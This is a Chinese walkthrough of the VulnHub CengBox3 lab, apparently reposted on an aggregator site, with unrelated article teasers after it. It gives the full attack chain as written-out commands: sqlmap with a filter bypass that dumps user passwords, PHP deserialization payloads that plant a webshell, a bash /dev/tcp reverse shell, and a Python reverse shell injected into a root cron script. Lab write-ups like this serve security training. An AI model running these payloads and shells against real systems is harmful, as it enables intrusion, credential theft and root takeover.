vulnhub靶场之CengBox3

1.信息收集

输入命令:netdiscover -i eth0 -r 192.168.239.0 ,发现181机器存活
在这里插入图片描述
输入命令nmap -p- -sV -O -Pn -A 192.168.239.181 ,进行端口探测,发现存在22、80、443端口,还发现存在域名ceng-company.vm。
在这里插入图片描述
将域名ceng-company.vm绑定在/etc/hosts文件中,再到浏览器上访问ceng-company.vm,发现是Agency网站。
在这里插入图片描述
使用命令searchsploit Agency,搜索存在的历史命令,,查看源码未发现版本信息,逐个尝试未成功。
在这里插入图片描述
进行目录扫描:gobuster dir -u http://ceng-company.vm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x .zip,.php,.txt,.html,.rar,.php.bak,发现存在poem.txt文件,打开未发现可利用
在这里插入图片描述
在这里插入图片描述

进行域名扫描:gobuster vhost --append-domain -u ceng-company.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | grep "Status: 200",发现存在dev.ceng-company.vm
在这里插入图片描述
浏览器访问,发现是一个登录页面。
在这里插入图片描述
抓包,进行sqlmap注入探测,发现存在sql注入漏洞
在这里插入图片描述
在这里插入图片描述

2.漏洞利用

在获取数据库的时候,发现获取不到,猜测有过滤,看到sqlmap提示字符“>”似乎是由后端服务器过滤,使用–tamper=between进行绕过。
在这里插入图片描述
输入命令:sqlmap -r sql.txt --random-agent --batch --level 3 --risk 3 -D MySql --tamper=between -D cengbox -T users -C "login,name,password" --dump,来获取用户名与密码。
在这里插入图片描述
添加评论,发现PHP序列号,猜测存在PHP反序列化漏洞
在这里插入图片描述

data=O:4:"Poem":3:{s:8:"poemName";s:4:"1345";s:10:"isPoetrist";O:8:"poemFile":2:{s:8:"filename";s:22:"/var/www/html/poem.txt";s:8:"poemName";s:4:"1345";}s:9:"poemLines";s:3:"789";}

在这里插入图片描述
构造POC:O:4:"Poem":3:{s:8:"poemName";s:4:"1345";s:10:"isPoetrist";O:8:"poemFile":2:{s:8:"filename";s:22:"/var/www/html/pin1.php";s:8:"poemName";s:19:"<?php phpinfo(); ?>";}s:9:"poemLines";s:3:"789";}(需要经过url编码),利用成功。
在这里插入图片描述
构造命令执行的exp:O:4:"Poem":3:{s:8:"poemName";s:4:"1345";s:10:"isPoetrist";O:8:"poemFile":2:{s:8:"filename";s:21:"/var/www/html/cmd.php";s:8:"poemName";s:27:"<?php system($_GET[123]);?>";}s:9:"poemLines";s:3:"789";}(需要经过url编码),执行命令成功。
在这里插入图片描述
在这里插入图片描述

3.提权

反弹shell,bash -c "exec bash -i &>/dev/tcp/192.168.239.131/1234 <&1"
在这里插入图片描述
在这里插入图片描述
上传pspy64s,进行信息收集,发现存在login.py。
在这里插入图片描述
因为是定时执行的任务,目标主机又安装有tcpdump,故使用tcpdump来抓取目标主机的流量,抓取3分钟左右。
在这里插入图片描述
在这里插入图片描述
将抓取到的流量下载到本地上,并使用strings进行查看,发现用户eric的密码为:3ricThompson*Covid19
在这里插入图片描述
切换到eric,往login.py文件中写入反弹,并监听端口,反弹成功,权限为root。

echo "'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.239.131",1478));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'" > login.py

在这里插入图片描述在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/7984.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

了解Unity编辑器之组件篇Tilemap(五)

了解Unity编辑器之组件篇Tilemap(五)

Tilemap&#xff1a;用于创建和编辑2D网格地图的工具。Tilemap的主要作用是简化2D游戏中地图的创建、编辑和渲染过程。以下是一些Tilemap的主要用途&#xff1a; 2D地图绘制&#xff1a;Tilemap提供了一个可视化的编辑器界面&#xff0c;可以快速绘制2D地图&#xff0c;例如迷…
阅读更多...
docker版jxTMS使用指南:新建用户并授权

docker版jxTMS使用指南:新建用户并授权

本文讲解4.4版jxTMS中如何新建用户并授权&#xff0c;整个系列的文章请查看&#xff1a;[docker版jxTMS使用指南&#xff1a;docker版jxTMS使用指南&#xff1a;4.4版升级内容 docker版本的使用&#xff0c;请查看&#xff1a;docker版jxTMS使用指南 4.0版jxTMS的说明&#x…
阅读更多...
python实现逻辑回归-清风数学建模-二分类水果数据

python实现逻辑回归-清风数学建模-二分类水果数据

所用数据 &#x1f449;&#x1f449;&#x1f449;二分类水果数据 1.数据预处理 可以看到有4个特征&#xff0c;2种分类结果&#xff0c;最后4个没有分类结果的数据是拿来预测的 # 1. 数据预处理 import pandas as pd df pd.read_excel(oridata/二分类水果数据.xlsx,use…
阅读更多...
开源大模型LLaMA 2会扮演类似Android的角色么?

开源大模型LLaMA 2会扮演类似Android的角色么?

在AI大模型没有商业模式&#xff1f;等文章中&#xff0c;我多次表达过这样一个观点&#xff1a;不要把大模型的未来应用方式比喻成公有云&#xff0c;大模型最终会是云端操作系统的核心&#xff08;新通用计算平台&#xff09;&#xff0c;而它的落地形式会很像过去的沃森&…
阅读更多...
【C++】开源:Linux端ALSA音频处理库

【C++】开源:Linux端ALSA音频处理库

&#x1f60f;★,:.☆(&#xffe3;▽&#xffe3;)/$:.★ &#x1f60f; 这篇文章主要介绍Linux端ALSA音频处理库。 无专精则不能成&#xff0c;无涉猎则不能通。。——梁启超 欢迎来到我的博客&#xff0c;一起学习&#xff0c;共同进步。 喜欢的朋友可以关注一下&#xff0c…
阅读更多...
Python增删改查小练习

Python增删改查小练习

目录 1. List操作-增加 2. List操作-查询 3. List操作-修改 4. List操作-删除 资料获取方法 1. List操作-增加 List Append(“xx”) 插入到列表尾部 Insert(x,xx) 在指定的位置插入 Extend 将列表的元素分开,插入到之前列表的尾部 小练习: 把一个字符串”abcdefg…
阅读更多...
ssh打开远程vscode

ssh打开远程vscode

如果想要远程打开其他终端的vscode&#xff0c;首先要知道远程终端的ip地址和用户名称以及用户密码 1、打开本地vscode 2、点击左下角蓝色区域 3、页面上部出现如下图&#xff0c;点击ssh&#xff0c;我这里已经连接&#xff0c;所以是connect to host 4、选择Add New SSH Host…
阅读更多...
线程池几个核心参数说明

线程池几个核心参数说明

线程池几个核心参数 corePoolSize&#xff1a;核心线程数量大小。maximumPoolSize&#xff1a;线程池最大容纳线程数。keepAliveTime&#xff1a;线程空闲后的存活时长。TimeUnit&#xff1a;单位时间。BlockingQueue&#xff1a;缓存异步任务的队列。 ThreadFactory &#xff…
阅读更多...
appium中toast识别

appium中toast识别

目录 一、什么是Toast&#xff1f; 二、环境前提 三、修改配置 四、安装驱动 五、常见报错及解决方案 1、cnpm 不识别&#xff0c;提示不是内部或外部命令 2、npm 也不识别 3、报错 六、代码节选 一、什么是Toast&#xff1f; Android中的Toast是一种简易的消息提示框…
阅读更多...
比selenium体验更好的ui自动化测试工具: cypress介绍

比selenium体验更好的ui自动化测试工具: cypress介绍

话说 Cypress is a next generation front end testing tool built for the modern web. And Cypress can test anything that runs in a browser.Cypress consists of a free, open source, locally installed Test Runner and a Dashboard Service for recording your tests.…
阅读更多...
AutoSAR系列讲解(实践篇)9.1-协议数据单元PDU

AutoSAR系列讲解(实践篇)9.1-协议数据单元PDU

本章主要是讲解通信(不包括诊断和标定的纯通信),同样是主要以CAN来讲解。由于通信大家其实用的基本上是其最基础的功能,所以本章的实验主要就是教大家如何配置基础通信,但是高级一点的功能,博主也会在前面这几节给大家讲到,用不到的同学仅作了解就行。同样,忘了通信是怎…
阅读更多...
day44-Spring_AOP

day44-Spring_AOP

0目录 1.2.3 1.Spring_AOP 实体类&#xff1a; Mapper接口&#xff1a; Service和实现类&#xff1a; 测试1&#xff1a; 运行后&#xff1a; 测试2&#xff1a;无此型号时 测试3&#xff1a;库存不足时 解决方案1&#xff1a;事务声明管理器 测试&#xff1a…
阅读更多...
Grub2基础上添加Windows引导和临时启动Windows

Grub2基础上添加Windows引导和临时启动Windows

grub2临时启动Windows 在引导列表页按c进入Grub2终端 。 insmod part_gpt set root(hd0, 1) chainloader /efi/Microsoft/Boot/bootmgfw.efi bootinsmod part_gpt 导入模块&#xff0c;让grub可以看到gpt格式的硬盘&#xff08;这个有没有必要我也不清楚&#xff0c;但执行…
阅读更多...
WPF实战学习笔记06-设置待办事项界面

WPF实战学习笔记06-设置待办事项界面

设置待办事项界面 创建待办待办事项集合并初始化 TodoViewModel&#xff1a; using Mytodo.Common.Models; using Prism.Commands; using Prism.Mvvm; using System; using System.Collections.Generic; using System.Collections.ObjectModel; using System.Linq; using Sy…
阅读更多...
RocketMQ主从集群broker无法启动,日志报错

RocketMQ主从集群broker无法启动,日志报错

使用vmWare安装的centOS7.9虚拟机&#xff0c;RocketMQ5.1.3 在rocketMQ的bin目录里使用相对路径的方式启动broker&#xff0c;jps查询显示没有启动&#xff0c;日志报错如下 排查配置文件没有问题&#xff0c;nameServer也已经正常启动 更换绝对路径&#xff0c;启动broker&…
阅读更多...
建造者设计模式go实现尝试

建造者设计模式go实现尝试

文章目录 前言代码结果总结 前言 本文章尝试使用go实现“建造者”。 代码 package mainimport ("fmt" )// 产品1。可以有不同的毫无相关的产品&#xff0c;这里只举一个 type Product1 struct {parts []string }// 产品1逻辑。打印组成产品的部分 func (p *Product…
阅读更多...
MySQL之函数、视图、存储过程

MySQL之函数、视图、存储过程

MySQL视图、函数与存储过程 1. 函数 1.1 语法 -- 函数是需要有返回值的,只能返回一个值 CREATE FUNCTION funcation_name (param_name data_type [, param_name2 data_type]) RETURNS return_data_type DETERMINISTIC -- 可选项&#xff0c;用于执行函数对于相同入参&#x…
阅读更多...
[ELK使用篇]:SpringCloud整合ELK服务

[ELK使用篇]:SpringCloud整合ELK服务

文章目录 一&#xff1a;前置准备-(参考之前博客)&#xff1a;1.1&#xff1a;准备Elasticsearch和Kibana环境&#xff1a;1.1.1&#xff1a;地址&#xff1a;[https://blog.csdn.net/Abraxs/article/details/128517777](https://blog.csdn.net/Abraxs/article/details/1285177…
阅读更多...
关于uni.createInnerAudioContext()的duration音频长度获取不到问题

关于uni.createInnerAudioContext()的duration音频长度获取不到问题

关于uni.createInnerAudioContext()的duration音频长度获取不到问题 代码如下&#xff1a; onLoad() {let _this this//初始化语音播放对象this.audioObj uni.createInnerAudioContext();this.audioObj.src 音频链接;// 音频进入可以播放状态&#xff0c;但不保证后面可以流…
阅读更多...
MySQL explain详解

MySQL explain详解

文章目录 0 环境准备1 explain 之 id2 explain 之 select_type3 explain 之 table4 explain 之 type5 explain 之 key6 explain 之 rows7 explain 之 extra MySQL 的 EXPLAIN 是一个用于查询优化的关键字。它用于分析和评估查询语句的执行计划&#xff0c;帮助开发者理解查询语…
阅读更多...
最新文章

Copyright @ 2022~2023